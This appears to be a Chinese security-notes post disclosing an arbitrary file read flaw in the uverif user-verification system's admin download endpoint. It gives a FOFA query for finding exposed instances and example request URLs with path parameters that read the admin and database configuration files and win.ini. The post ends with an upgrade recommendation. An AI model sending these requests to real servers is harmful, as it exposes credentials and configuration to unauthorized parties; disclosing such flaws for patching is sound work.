免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!

漏洞名称

U验证任意文件读取漏洞

漏洞影响

uverif <= v2.0.4-beta,uverif <= v2.0

uverif是一个开源项目,相关链接如下:

官网: https://user.uverif.com/

Github: https://github.com/51154393/uverif

Gitee: https://gitee.com/dagg/uverif

漏洞描述

uverif网络验证用户管理系统,该系统uverif <= v2.0.4-beta,uverif <= v2.0版本中存在任意文件读取漏洞。

导致存在漏洞的代码如下

这是一个PHP命名空间为Ue\tools的类download的代码。该类提供了一个静态方法download,用于下载文件。

方法接受两个参数:$filename表示要下载的文件路径,$downLoadName表示下载时保存的文件名(可选,默认为原始文件名)。

FOFA搜索语句

body="U用户验证系统1.0"

漏洞复现

其漏洞点在于登录后台后生成卡密导出的下载处

http://127.0.0.1/admin/download?path=./app/data/kami/202401210556174.txt

修改路径即可构造任意文件读取, “./“代表当前目录,可读取数据库配置文件,当前管理员账户密码等

http://127.0.0.1/admin/download?path=./config/admin.php

http://127.0.0.1/admin/download?path=./config/config.php

读取C:\Windows\win.ini


漏洞复现成功

修复建议

升级到最新版本。